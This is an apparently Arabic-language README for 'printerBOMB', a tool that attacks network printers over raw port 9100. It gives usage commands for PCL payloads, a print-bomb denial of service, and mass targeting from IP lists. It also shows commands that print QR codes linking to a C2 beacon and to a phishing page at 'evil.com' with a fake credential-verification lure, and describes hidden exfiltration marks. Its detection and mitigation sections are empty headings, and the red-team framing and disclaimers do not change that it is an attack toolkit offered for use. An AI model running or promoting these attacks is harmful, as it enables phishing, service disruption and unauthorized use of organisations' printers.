
إطار عمل لاستغلال الطابعات لاختبار الأمان عبر المنفذ الخام 9100، يتضمن تسليم حمولات PCL، وقصف DoS، ورموز QR للتحكم والقيادة (C2)، ورموز QR للتصيد الاحتيالي، وعلامات استخراج البيانات الخفية.
____ _ _ _____ _ _ ___
| _ \| | | | | __ \ | \ | | _|
| |_) | | __ | | __ | |__) | __ | \| | | _
| _ <| | / _| | |/ / | ___/ ' \| . ` | | (_)
| |_) | | \_| | < | | | (_) | |\ | |___ |
|____/|_| \__ |_|\_\|_| \___/|_| \_|_____|
_ _ | |
| | | | | |
| |_| | | |
\___/ |_|
______
|______|
| |
|______|
🖨️ printerBOMB - إطار عمل هجمات سبول الطابعات
استغلال ناقل الهجوم المُهمَل: طابعات شبكتك
تم التطوير بواسطة: Azhari Ramadhan 🔥
PrintHack هي أداة متطورة لاستغلال الطابعات، مصممة لـ محترفي الأمن، فرق الاختراق الأحمر (Red Teamers)، ومختبري الاختراق. تستخدم هذه الأداة بروتوكول سبول الطابعات الخام (المنفذ 9100) لإجراء تقييمات أمنية، واختبار ثغرات الطابعات، ومحاكاة سيناريوهات هجوم واقعية.
⚠️ إخلاء مسؤولية: هذه الأداة مخصصة لـ الاختبارات الأمنية المشروعة و الأغراض التعليمية فقط. استخدمها بمسؤولية وفقط على الأنظمة التي تملكها أو لديك إذن صريح لاختبارها.
git clone https://github.com/AzhariRamadhan/CVE-PORT-9100.git
cd CVE-PORT-9100
pip install -r requirements.txt
Pillow - معالجة الصورqrcode - توليد رموز QRrequests - طلبات HTTPpip install Pillow qrcode requests
# اختبار اتصال الطابعة
python3 printerhack.py -t 192.168.1.100 --check
# إرسال صفحة اختبار
python3 printerhack.py -t 192.168.1.100 --test
# طباعة رسالة مخصصة
python3 printerhack.py -t 192.168.1.100 -m "Hello from Red Team!"
# طباعة صورة من URL (محولة إلى ASCII)
python3 printerhack.py -t 192.168.1.100 -i http://example.com/image.png
# إرسال حمولة PCL
python3 printerhack.py -t 192.168.1.100 --pcl
# قنبلة الطباعة (DoS - 10MB)
python3 printerhack.py -t 192.168.1.100 --bomb 10
# طباعة رمز QR لاستدعاء C2
python3 printerhack.py -t 192.168.1.100 --c2 "http://c2-server:8080/beacon"
# طباعة رمز QR للتصيد
python3 printerhack.py -t 192.168.1.100 --phish "http://evil.com/login" "URGENT: Verify your credentials"
# الطباعة إلى طابعات متعددة من ملف
echo -e "192.168.1.100\n192.168.1.101\n192.168.1.102" > targets.txt
python3 printerhack.py -f targets.txt -m "Security Test Message"
طباعة رسائل أو تعليمات سرية إلى طابعات مخترقة في سيناريوهات الوصول المادي.
طباعة رموز QR تربط بصفحات جمع بيانات الاعتماد مقنعة كإشعارات أمنية.
استخدام مخرجات الطابعة كقناة سرية لاستخراج البيانات المشفرة.
اختبار مرونة المؤسسة ضد هجمات حجب الخدمة القائمة على الطابعات.
تعداد وتحديد الطابعات عبر الشبكة.
مؤشرات الاكتشاف:
استراتيجيات التخفيف:
THIS TOOL IS PROVIDED "AS IS" FOR LEGITIMATE SECURITY TESTING ONLY.
THE AUTHOR IS NOT LIABLE FOR ANY MISUSE OF THIS TOOL.
ALWAYS obtain written authorization before testing any system.
Unauthorized use may violate Computer Fraud and Abuse Act (CFAA)
and similar laws in your jurisdiction.
Developed by: Azhari Ramadhan
المساهمات مرحب بها! يرجى التأكد من:
المطور: Azhari Ramadhan 🔥
رخصة MIT - راجع LICENSE للتفاصيل
🖨️ printerBOMB - استغلال خط الدفاع الأخير
ابقَ متقدمًا على المهاجمين من خلال التفكير مثلهم
صُنع بـ 🔥 بواسطة Azhari Ramadhan
| الميزة | الوصف |
|---|
--check | اختبار اتصال الطابعة |
--test | إرسال صفحة اختبار |
--message | طباعة حمولات مخصصة |
--image | طباعة صورة من URL (فن ASCII) |
--pcl | إرسال حمولة بتنسيق PCL |
--bomb | هجوم DoS (حمولة ضخمة) |
--c2 | طباعة رمز QR لاستدعاء C2 |
--phish | طباعة رمز QR للتصيد |
--exfil | طباعة علامة استخراج البيانات |
--file | طباعة جماعية لأهداف متعددة |